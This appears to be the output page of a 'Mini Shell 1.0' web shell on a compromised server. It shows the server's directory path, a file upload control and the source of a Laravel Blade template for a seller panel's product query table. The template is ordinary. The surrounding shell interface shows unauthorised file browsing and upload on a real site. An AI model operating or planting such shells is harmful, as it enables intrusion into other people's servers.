HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/resources/views/seller/product_query/
Upload File :
Current File : /var/www/devs.lapieza.net/resources/views/seller/product_query/index.blade.php
@extends('seller.layouts.app')



@section('panel_content')

    <div class="card">

        <div class="card-header">

            <h5 class="mb-0 h6">{{ translate('Product Queries') }}</h5>

        </div>

        <div class="card-body">

            <table class="table aiz-table mb-0" cellspacing="0" width="100%">

                <thead>

                    <tr>

                        <th data-breakpoints="lg">#</th>

                        <th>{{ translate('User Name') }}</th>

                        <th>{{ translate('Product Name') }}</th>

                        <th data-breakpoints="lg">{{ translate('Question') }}</th>

                        <th data-breakpoints="lg">{{ translate('Reply') }}</th>

                        <th>{{ translate('status') }}</th>

                        <th class="text-right">{{ translate('Options') }}</th>

                    </tr>

                </thead>

                <tbody>

                    @foreach ($queries as $key => $query)

                        <tr>

                            <td>{{ $queries->firstItem() + $key }}</td>

                            <td>

								

								@if(isset($query->user->name))

									{{ $query->user->name }}

								@else

									{{ translate('Product Not found') }}

								@endif

							</td>

                            <td>

								@if(isset($query->product->name))

									{{ $query->product->name }}

								@else

									{{ translate('Product Not found') }}

								@endif

							</td>

                            <td>{{ Str::limit($query->question, 100) }}</td>

                            <td>{{ Str::limit($query->reply, 100) }}</td>

                            <td>

                                <span

                                    class="badge badge-inline {{ $query->reply == null ? 'badge-warning' : 'badge-success' }}">

                                    {{ $query->reply == null ? translate('Not Replied') : translate('Replied') }}

                                </span>

                            </td>

                            <td class="text-right">

                                <a class="btn btn-soft-primary btn-icon btn-circle btn-sm"

                                    href="{{ route('seller.product_query.show', encrypt($query->id)) }}"

                                    title="{{ translate('View') }}">

                                    <i class="las la-eye"></i>

                                </a>

                            </td>

                        </tr>

                    @endforeach

                </tbody>

            </table>

            <div class="aiz-pagination">

                {{ $queries->appends(request()->input())->links() }}

            </div>

        </div>

    </div>

@endsection



@section('modal')

    @include('modals.delete_modal')

@endsection